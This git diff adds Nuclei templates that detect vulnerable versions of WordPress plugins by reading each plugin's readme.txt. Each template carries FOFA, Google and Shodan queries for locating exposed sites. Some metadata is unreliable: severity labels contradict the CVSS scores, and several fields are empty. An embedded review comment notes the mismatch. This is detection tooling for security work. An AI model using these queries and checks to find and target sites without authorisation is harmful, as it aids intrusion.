+++ b/poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+ Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11202
+ metadata:
+ fofa-query: "wp-content/plugins/cm-business-directory/"
+ google-query: inurl:"/wp-content/plugins/cm-business-directory/"
+ shodan-query: 'vuln:CVE-2024-11202'
+ tags: cve,wordpress,wp-plugin,cm-business-directory,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-business-directory/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-business-directory"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.1')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml b/poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml
new file mode 100644
index 0000000000..0bd5c16918
--- /dev/null
+++ b/poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+ Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11202
+ metadata:
+ fofa-query: "wp-content/plugins/cm-header-footer-script-loader/"
+ google-query: inurl:"/wp-content/plugins/cm-header-footer-script-loader/"
+ shodan-query: 'vuln:CVE-2024-11202'
+ tags: cve,wordpress,wp-plugin,cm-header-footer-script-loader,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-header-footer-script-loader/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-header-footer-script-loader"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml b/poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml
new file mode 100644
index 0000000000..59c5e3bdd8
--- /dev/null
+++ b/poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512
+
+info:
+ name: >
+ Premium Packages – Sell Digital Products Securely <= 5.9.3 - Reflected Cross-Site Scripting via add_query_arg
+ author: topscoder
+ severity: medium
+ description: >
+ The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.9.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e847fd-0932-4d65-a201-b86e39a33588?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11225
+ metadata:
+ fofa-query: "wp-content/plugins/wpdm-premium-packages/"
+ google-query: inurl:"/wp-content/plugins/wpdm-premium-packages/"
+ shodan-query: 'vuln:CVE-2024-11225'
+ tags: cve,wordpress,wp-plugin,wpdm-premium-packages,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpdm-premium-packages/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpdm-premium-packages"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.9.3')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml b/poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml
new file mode 100644
index 0000000000..9ee712546d
--- /dev/null
+++ b/poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41
+
+info:
+ name: >
+ Constant Contact Forms by MailMunch <= 2.0.11 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Constant Contact Forms by MailMunch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 2.0.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a84bd9c8-97bd-4572-8bfa-5191d98c9523?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-22137
+ metadata:
+ fofa-query: "wp-content/plugins/constant-contact-forms-by-mailmunch/"
+ google-query: inurl:"/wp-content/plugins/constant-contact-forms-by-mailmunch/"
+ shodan-query: 'vuln:CVE-2024-22137'
+ tags: cve,wordpress,wp-plugin,constant-contact-forms-by-mailmunch,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/constant-contact-forms-by-mailmunch/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "constant-contact-forms-by-mailmunch"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.11')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml b/poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml
new file mode 100644
index 0000000000..ee9b2848a9
--- /dev/null
+++ b/poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f
+
+info:
+ name: >
+ VdoCipher <= 1.29 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The VdoCipher plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae7fa018-c87f-463b-84a3-bbe71b73d3dd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-47639
+ metadata:
+ fofa-query: "wp-content/plugins/vdocipher/"
+ google-query: inurl:"/wp-content/plugins/vdocipher/"
+ shodan-query: 'vuln:CVE-2024-47639'
+ tags: cve,wordpress,wp-plugin,vdocipher,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/vdocipher/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "vdocipher"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.29')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml b/poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml
new file mode 100644
index 0000000000..100cc6f1bb
--- /dev/null
+++ b/poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9307-99143edb3a824cd072b593997866abef
+
+info:
+ name: >
+ mFolio Lite <= 1.2.1 - Missing Authorization to Authenticated (Author+) File Upload via EXE and SVG Files
+ author: topscoder
+ severity: low
+ description: >
+ The mFolio Lite plugin for WordPress is vulnerable to file uploads due to a missing capability check in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file or upload arbitrary EXE files on the affected site's server which may make remote code execution possible if the attacker can also gain access to run the .exe file, or trick a site visitor into downloading and running the .exe file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b4012dd-7c0a-45f1-8ada-8f9dc6867e1e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.9
+ cve-id: CVE-2024-9307
+ metadata:
+ fofa-query: "wp-content/plugins/mfolio-lite/"
+ google-query: inurl:"/wp-content/plugins/mfolio-lite/"
+ shodan-query: 'vuln:CVE-2024-9307'
+ tags: cve,wordpress,wp-plugin,mfolio-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mfolio-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mfolio-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
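Review bot: `severity: low` and the trailing `low` tag contradict `cvss-score: 9.9` with vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H`, which is Critical, so any severity-filtered run will skip a file-upload-to-RCE template. Change the two lines to `severity: critical` and `tags: cve,wordpress,wp-plugin,mfolio-lite,critical`. The same drift appears in CVE-2024-11119, CVE-2024-22137 and CVE-2024-47639, which carry cvss-score 6.4 (Medium) with `severity: low`; severity seems to be set independently of the score, so the generator that produces these files is worth checking rather than fixing the four by hand.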
diff --git a/poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml b/poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml
new file mode 100644
index 0000000000..1d417657e1
--- /dev/null
+++ b/poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml
@@ -0,0 +1,59 @@
+id: bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca
+
+info:
+ name: >
+ BNE Gallery Extended <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via gallery Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/bne-gallery-extended/"
+ google-query: inurl:"/wp-content/plugins/bne-gallery-extended/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,bne-gallery-extended,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bne-gallery-extended/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bne-gallery-extended"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml b/poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml
new file mode 100644
index 0000000000..8a5f506d51
--- /dev/null
+++ b/poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml
@@ -0,0 +1,59 @@
+id: cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e
+
+info:
+ name: >
+ Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.43.2 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated Arbitrary Plugin Installation
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cleantalk-spam-protect/"
+ google-query: inurl:"/wp-content/plugins/cleantalk-spam-protect/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cleantalk-spam-protect,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cleantalk-spam-protect/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cleantalk-spam-protect"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.43.2')
\ No newline at end of file
diff --git a/poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml
new file mode 100644
index 0000000000..68243b5195
--- /dev/null
+++ b/poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml
@@ -0,0 +1,59 @@
+id: cm-business-directory-341142a6bceeaabdbeb709723a8564c9
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cm-business-directory/"
+ google-query: inurl:"/wp-content/plugins/cm-business-directory/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cm-business-directory,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-business-directory/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-business-directory"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.1')
\ No newline at end of file
diff --git a/poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml
new file mode 100644
index 0000000000..9b08fa3b6f
--- /dev/null
+++ b/poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml
@@ -0,0 +1,59 @@
+id: cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cm-email-blacklist/"
+ google-query: inurl:"/wp-content/plugins/cm-email-blacklist/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cm-email-blacklist,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-email-blacklist/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-email-blacklist"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.3')
\ No newline at end of file
diff --git a/poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml
new file mode 100644
index 0000000000..a8cdba0344
--- /dev/null
+++ b/poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml
@@ -0,0 +1,59 @@
+id: cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cm-header-footer-script-loader/"
+ google-query: inurl:"/wp-content/plugins/cm-header-footer-script-loader/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cm-header-footer-script-loader,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-header-footer-script-loader/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-header-footer-script-loader"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml
new file mode 100644
index 0000000000..6535040471
--- /dev/null
+++ b/poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml
@@ -0,0 +1,59 @@
+id: cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cm-on-demand-search-and-replace/"
+ google-query: inurl:"/wp-content/plugins/cm-on-demand-search-and-replace/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cm-on-demand-search-and-replace,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-on-demand-search-and-replace/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-on-demand-search-and-replace"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml
new file mode 100644
index 0000000000..175f8cadb7
--- /dev/null
+++ b/poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml
@@ -0,0 +1,59 @@
+id: cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cm-pop-up-banners/"
+ google-query: inurl:"/wp-content/plugins/cm-pop-up-banners/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cm-pop-up-banners,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-pop-up-banners/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-pop-up-banners"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.5')
\ No newline at end of file
diff --git a/poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml
new file mode 100644
index 0000000000..8d76e8c6c3
--- /dev/null
+++ b/poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml
@@ -0,0 +1,59 @@
+id: cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cm-video-lesson-manager/"
+ google-query: inurl:"/wp-content/plugins/cm-video-lesson-manager/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cm-video-lesson-manager,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-video-lesson-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-video-lesson-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.2')
\ No newline at end of file
diff --git a/poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml
new file mode 100644
index 0000000000..8dfff41221
--- /dev/null
+++ b/poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml
@@ -0,0 +1,59 @@ +id: enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/enhanced-tooltipglossary/" + google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,enhanced-tooltipglossary,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "enhanced-tooltipglossary" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.11') \ No newline at end of file diff --git a/poc/sql/error-sqli.yaml b/poc/sql/error-sqli.yaml new file mode 100644 index 0000000000..1b9ef0c64e --- /dev/null +++ b/poc/sql/error-sqli.yaml 
